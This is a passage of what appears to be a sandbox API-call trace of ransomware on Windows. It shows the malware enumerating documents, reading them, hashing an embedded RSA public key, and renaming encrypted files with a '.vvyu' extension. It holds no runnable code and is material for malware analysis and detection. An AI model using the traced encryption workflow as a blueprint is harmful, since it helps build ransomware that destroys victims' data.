hHeap=0x6a0000) returned 1 [0185.000] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0185.000] WriteFile (in: hFile=0x584, lpBuffer=0x2d42d38*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42d38*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0185.000] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42d38 | out: hHeap=0x6a0000) returned 1 [0185.000] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0185.001] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0185.001] CloseHandle (hObject=0x584) returned 1 [0185.002] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82bc0 [0185.002] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x860) returned 0x2d42908 [0185.002] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82bc0 | out: hHeap=0x6a0000) returned 1 [0185.003] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\vPMkP.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\vpmkp.xlsx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\vPMkP.xlsx.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\vpmkp.xlsx.vvyu")) returned 1 [0185.003] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0185.004] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0185.004] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.007] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0185.007] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36381180, ftCreationTime.dwHighDateTime=0x1d828b7, ftLastAccessTime.dwLowDateTime=0xbd461400, ftLastAccessTime.dwHighDateTime=0x1d82fa7, ftLastWriteTime.dwLowDateTime=0xbd461400, ftLastWriteTime.dwHighDateTime=0x1d82fa7, nFileSizeHigh=0x0, nFileSizeLow=0x7fdc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xyVBcXoxWZOEVZ7.pptx", cAlternateFileName="XYVBCX~1.PPT")) returned 1 [0185.007] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38760 [0185.007] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0185.008] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38760 | out: hHeap=0x6a0000) returned 1 [0185.008] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\xyVBcXoxWZOEVZ7.pptx") returned=".pptx" [0185.008] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\xyVBcXoxWZOEVZ7.pptx" (normalized: "c:\\users\\keecfmwgj\\documents\\xyvbcxoxwzoevz7.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0185.010] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=32732) returned 1 [0185.010] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0185.013] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x7fb6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0185.013] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0185.014] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0185.014] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x7fdc, lpOverlapped=0x0) returned 1 [0185.015] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0185.015] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0185.015] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0185.015] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0185.015] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0185.016] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0185.017] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0185.017] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0185.017] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0185.017] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0185.017] GetLastError () returned 0x0 [0185.017] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0185.017] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0185.017] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0185.017] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0185.017] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0185.017] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0185.017] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0185.017] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0185.017] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0185.017] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7fe0) returned 0x2d43778 [0185.018] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0185.018] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0185.018] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0185.018] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0185.018] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0185.018] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0185.018] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38760 [0185.018] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4ea50 [0185.018] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d387a8 [0185.018] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4ea68 [0185.018] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4ea98 [0185.018] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4eaf8 [0185.019] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4eab0 [0185.019] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0185.019] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2d31688 [0185.019] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2d31688, Size=0x218) returned 0x2d3b920 [0185.019] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0185.019] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea98 | out: hHeap=0x6a0000) returned 1 [0185.019] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eab0 | out: hHeap=0x6a0000) returned 1 [0185.019] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eaf8 | out: hHeap=0x6a0000) returned 1 [0185.019] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0185.019] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0185.019] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4eaf8 [0185.020] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378c0 [0185.020] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4eab0 [0185.020] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0185.020] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2c4ea98 [0185.020] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0185.020] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0185.020] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0185.020] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0185.020] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0185.020] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0185.020] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446e8 [0185.020] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0185.020] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0185.020] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eab0 | out: hHeap=0x6a0000) returned 1 [0185.021] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0185.021] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea98 | out: hHeap=0x6a0000) returned 1 [0185.021] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0185.021] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0185.021] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eaf8 | out: hHeap=0x6a0000) returned 1 [0185.021] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0185.021] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0185.022] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0185.022] GetCurrentThreadId () returned 0x264 [0185.022] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0185.022] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d372e8 [0185.022] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0185.022] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0185.022] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2c84da8 [0185.022] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0185.022] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0185.022] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0185.022] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0185.022] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0185.022] GetCurrentThreadId () returned 0x264 [0185.022] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0185.023] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0185.023] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0185.023] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0185.023] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0185.023] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0185.023] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0185.024] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0185.024] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0185.024] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0185.024] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82bc0 [0185.024] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0185.024] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0185.024] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0185.024] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4eaf8 [0185.024] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0185.024] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0185.024] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0185.024] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0185.024] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0185.024] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0185.024] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0185.024] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0185.024] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4ea98 [0185.024] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0185.024] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0185.024] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0185.025] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0185.025] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0185.025] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0185.025] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0185.025] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4eab0 [0185.025] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0185.025] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0185.025] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0185.025] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4ea80 [0185.025] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0185.025] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4eb10 [0185.025] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0185.025] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0185.025] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0185.025] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4eae0 [0185.025] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0185.025] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4eac8 [0185.025] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0185.025] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4eb28 [0185.025] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eac8 | out: hHeap=0x6a0000) returned 1 [0185.025] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4eac8 [0185.025] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eae0 | out: hHeap=0x6a0000) returned 1 [0185.025] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0185.026] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0185.026] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0185.026] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0185.026] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0185.026] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea98 | out: hHeap=0x6a0000) returned 1 [0185.026] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4ea98 [0185.026] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0185.026] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d2fc98 [0185.026] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eaf8 | out: hHeap=0x6a0000) returned 1 [0185.026] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0185.026] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eb28 | out: hHeap=0x6a0000) returned 1 [0185.026] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d42908 [0185.026] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0185.026] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c03ca0 [0185.026] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0185.026] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0185.026] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea98 | out: hHeap=0x6a0000) returned 1 [0185.026] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d42b20 [0185.027] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0185.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c0ec50 [0185.027] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0185.027] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0185.027] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0185.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0ec50 | out: hHeap=0x6a0000) returned 1 [0185.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0185.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0185.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0185.029] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42b20 | out: hHeap=0x6a0000) returned 1 [0185.029] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0185.029] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0185.029] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eac8 | out: hHeap=0x6a0000) returned 1 [0185.029] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0185.029] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eb10 | out: hHeap=0x6a0000) returned 1 [0185.029] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0185.029] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eab0 | out: hHeap=0x6a0000) returned 1 [0185.029] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea80 | out: hHeap=0x6a0000) returned 1 [0185.029] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84da8 | out: hHeap=0x6a0000) returned 1 [0185.030] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0185.030] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0185.030] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea68 | out: hHeap=0x6a0000) returned 1 [0185.030] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d387a8 | out: hHeap=0x6a0000) returned 1 [0185.031] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc98 | out: hHeap=0x6a0000) returned 1 [0185.031] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0185.031] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82bc0 | out: hHeap=0x6a0000) returned 1 [0185.031] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0185.031] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0185.032] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0185.032] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0185.032] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0185.032] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, 